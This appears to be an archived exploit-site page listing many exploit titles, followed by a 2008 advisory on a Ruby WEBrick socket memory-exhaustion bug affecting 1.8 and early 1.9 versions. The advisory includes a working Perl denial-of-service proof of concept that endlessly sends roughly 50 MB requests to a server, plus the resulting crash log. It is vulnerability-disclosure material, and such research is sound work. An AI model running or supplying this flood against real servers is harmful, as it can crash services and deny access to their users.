
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
88 lines
2.5 KiB
Text
Executable file
88 lines
2.5 KiB
Text
Executable file
-------------------------------------------------------
|
|
Language : Ruby
|
|
|
|
Web Site: www.ruby-lang.org
|
|
|
|
Platform: All
|
|
|
|
Bug: Remote Socket Memory Leak
|
|
|
|
Products Affected:
|
|
1.8 series:
|
|
- 1.8.5 and all prior versions
|
|
- 1.8.6-p286 and all prior versions
|
|
- 1.8.7-p71 and all prior versions
|
|
|
|
1.9 series
|
|
- r18423 and all prior revisions
|
|
|
|
Confirmed by the vendor: Yes
|
|
|
|
Patch available : Yes
|
|
-------------------------------------------------------
|
|
|
|
1) Introduction
|
|
2) Bug
|
|
3) Proof of concept
|
|
4) Credits
|
|
|
|
===============
|
|
1) Introduction
|
|
===============
|
|
"A dynamic, open source programming language with a focus on simplicity and productivity.
|
|
It has an elegant syntax that is natural to read and easy to write."
|
|
|
|
=======
|
|
2) Bug
|
|
=======
|
|
Ruby fails to handle properly the memory allocated for a socket
|
|
So when you send ~ 4 big request to a ruby socket, ruby will go
|
|
in infinite loop, and then crash.
|
|
The bug reside in the regex engine (in regex.c).
|
|
|
|
==================
|
|
3)Proof of concept
|
|
===================
|
|
This poc is an exemple for Webrick web server
|
|
crap.pl :
|
|
|
|
#!/usr/bin/perl
|
|
use LWP::Simple;
|
|
my $payload = "\x41" x 49999999;
|
|
while(1)
|
|
{
|
|
print "[+]\n";
|
|
get "http://127.0.0.1:2500/".$payload."";
|
|
}
|
|
|
|
Result (Exemple on Webrick web server):
|
|
|
|
[2008-07-11 22:39:55] INFO WEBrick 1.3.1
|
|
[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux]
|
|
[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500
|
|
[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory
|
|
/usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line'
|
|
/usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse'
|
|
/usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run'
|
|
/usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
|
|
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start'
|
|
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
|
|
/usr/lib/ruby/1.8/webrick/server.rb:95:in `start'
|
|
/usr/lib/ruby/1.8/webrick/server.rb:92:in `each'
|
|
/usr/lib/ruby/1.8/webrick/server.rb:92:in `start'
|
|
/usr/lib/ruby/1.8/webrick/server.rb:23:in `start'
|
|
/usr/lib/ruby/1.8/webrick/server.rb:82:in `start'
|
|
/home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch'
|
|
script/server:62
|
|
[FATAL] failed to allocate memory
|
|
root@audit:/home/audit#
|
|
|
|
=====
|
|
5)Credits
|
|
=====
|
|
|
|
laurent gaffié
|
|
|
|
laurent.gaffie{remove_this}[at]gmail[dot]com
|
|
|
|
# milw0rm.com [2008-08-13]
|